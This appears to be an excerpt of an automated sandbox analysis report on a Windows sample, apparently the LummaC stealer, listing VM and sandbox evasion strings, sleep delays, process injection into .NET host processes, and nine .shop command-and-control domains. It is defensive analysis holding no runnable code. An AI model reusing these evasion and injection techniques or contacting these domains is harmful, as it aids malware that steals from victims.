Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 2M1NS61GG8.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7600, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\^Q
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,^Q
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 8ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 9ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: A0C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: B0C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: B4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: C4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: D4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: EBA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: FBA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 10BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 11BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 9ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: 9ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: B4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 47E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 77B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 87B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 8960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: ACC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: BCC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1170000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Window / User API: threadDelayed 511	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Window / User API: threadDelayed 2435	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Window / User API: threadDelayed 473	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Window / User API: threadDelayed 6118	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99760s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99605s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -98719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -98609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7420	Thread sleep time: -98390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7500	Thread sleep time: -473000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7512	Thread sleep time: -302000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe TID: 7500	Thread sleep time: -6118000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8048	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8068	Thread sleep time: -53000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99760	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99605	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99390	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99281	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 98719	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 98609	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Thread delayed: delay time: 98390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware vmci bus device!vmware virtual s scsi disk device
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware svga
Source: 2M1NS61GG8.exe, 00000000.00000002.2410539634.0000000001368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-Vmicrosoft
Source: AddInProcess32.exe, 00000004.00000002.2512707463.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: AddInProcess32.exe, 00000004.00000002.2512707463.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,^q
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware pointing device
Source: InstallUtil.exe, 00000009.00000002.2484439385.000000000105F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}fQ*
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware sata
Source: 2M1NS61GG8.exe, 00000000.00000002.2439288632.0000000008C90000.00000004.08000000.00040000.00000000.sdmp, 2M1NS61GG8.exe, 00000000.00000002.2423755750.00000000042F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachineDetector
Source: AddInProcess32.exe, 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: InstallUtil.exe, 00000009.00000002.2484439385.000000000105F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware vmci bus device
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware usb pointing device
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\^q
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtools
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware virtual s scsi disk device
Source: AddInProcess32.exe, 00000008.00000002.2498975531.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: 2M1NS61GG8.exe, 00000000.00000002.2439288632.0000000008C90000.00000004.08000000.00040000.00000000.sdmp, 2M1NS61GG8.exe, 00000000.00000002.2423755750.00000000042F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_00435840 LdrInitializeThunk,

8_2_00435840

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 700000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 700000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 700000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 700000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wifeplasterbakewis.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: mealplayerpreceodsju.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bordersoarmanusjuw.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: suitcaseacanehalk.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: absentconvicsjawun.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pushjellysingeywus.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: economicscreateojsu.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: entitlementappwo.shop
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.0000000004119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rocketmusclesksj.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 700000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 702000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7C0000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7C8000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 56D008	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 700000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 702000	Jump to behavior
